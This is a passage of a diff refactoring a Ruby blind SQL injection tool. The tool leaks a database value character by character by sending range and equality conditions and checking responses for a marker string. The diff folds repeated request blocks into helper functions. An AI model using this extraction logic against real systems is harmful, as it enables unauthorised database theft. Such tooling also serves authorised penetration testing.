$i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end else for ch in $arrn2 - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end @@ -1138,25 +745,11 @@ def send2ndreq() end # special character - if found == 0 + if $letter == 0 for ch in $arrs - if $hex == "y" - configreq(" between" + " 0x" + ch.unpack('H*')[0] + " and " + "0x" + ch.unpack('H*')[0]) - else - configreq("between" + $oh + ch + $oh + "and" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cbetween(ch, ch, "yes") + if $letter == 1 + break end end end @@ -1164,278 +757,78 @@ def send2ndreq() elsif $mode == "a" # lowercase - if $hex == "y" - configreq(">=" + " 0x" + "a".unpack('H*')[0]) - else - configreq(">=" + $oh + "a") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless(">=", "a", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "m".unpack('H*')[0]) - else - configreq("<=" + $oh + "m") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "m", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "f".unpack('H*')[0]) - else - configreq("<=" + $oh + "f") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "f", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "c".unpack('H*')[0]) - else - configreq("<=" + $oh + "c") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "c", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr1 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr2 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "i".unpack('H*')[0]) - else - configreq("<=" + $oh + "i") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "i", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr3 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr4 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end end else - if $hex == "y" - configreq("<=" + " 0x" + "s".unpack('H*')[0]) - else - configreq("<=" + $oh + "s") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "s", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "p".unpack('H*')[0]) - else - configreq("<=" + $oh + "p") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "p", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr5 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr6 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "v".unpack('H*')[0]) - else - configreq("<=" + $oh + "v") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "v", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr7 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr8 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end @@ -1445,279 +838,79 @@ def send2ndreq() end # uppercase - only when case-sensitive specified - if $case == "y" && found == 0 - if $hex == "y" - configreq(">=" + " 0x" + "A".unpack('H*')[0]) - else - configreq(">=" + $oh + "A") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $case == "y" && $letter == 0 + cmoreless(">=", "A", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "M".unpack('H*')[0]) - else - configreq("<=" + $oh + "M") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "M", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "F".unpack('H*')[0]) - else - configreq("<=" + $oh + "F") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "F", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "C".unpack('H*')[0]) - else - configreq("<=" + $oh + "C") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "C", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr9 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr10 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "I".unpack('H*')[0]) - else - configreq("<=" + $oh + "I") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "I", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr11 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr12 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end end else - if $hex == "y" - configreq("<=" + " 0x" + "S".unpack('H*')[0]) - else - configreq("<=" + $oh + "S") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "S", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "P".unpack('H*')[0]) - else - configreq("<=" + $oh + "P") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "P", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr13 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr14 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end end else - if $hex == "y" - configreq("<=" + " 0x" + "V".unpack('H*')[0]) - else - configreq("<=" + $oh + "V") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "V", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arr15 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arr16 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end @@ -1728,71 +921,21 @@ def send2ndreq() end # numeric - if found == 0 - if $hex == "y" - configreq(">=" + " 0x" + "0".unpack('H*')[0]) - else - configreq(">=" + $oh + "0") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + if $letter == 0 + cmoreless(">=", "0", "no") if $response.body.include?($search) || $fheader == "y" - if $hex == "y" - configreq("<=" + " 0x" + "4".unpack('H*')[0]) - else - configreq("<=" + $oh + "4") - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } + cmoreless("<=", "4", "no") if $response.body.include?($search) || $fheader == "y" for ch in $arrn1 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end else for ch in $arrn2 - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 + cmoreless("=", ch, "yes") + if $letter == 1 break end end @@ -1801,32 +944,18 @@ def send2ndreq() end # special character - if found == 0 + if $letter == 0 for ch in $arrs - if $hex == "y" - configreq("=" + "0x" + ch.unpack('H*')[0]) - else - configreq("=" + $oh + ch) - end - sendreq() - send2ndreq() if $secfile != "" - $fheader = "n" - $response.to_hash.each { |k,v| - $fheader = "y" if k.to_s.include?($search) - $fheader = "y" if v.to_s.include?($search) - } - if $response.body.include?($search) || $fheader == "y" - $result = $result + ch - puts "Letter " + $i.to_s + " found: " + ch - found = 1 - break + cmoreless("=", ch, "yes") + if $letter == 1 + break end end end end # printing results - if found == 0 + if $letter == 0 if $result == "" puts "No results. Probably wrong pattern." break @@ -1838,7 +967,6 @@ def send2ndreq() end # means that there are still chars to enumerate -if found == 1 +if $letter == 1 puts "\nRetreving not finished:\n" + $result end -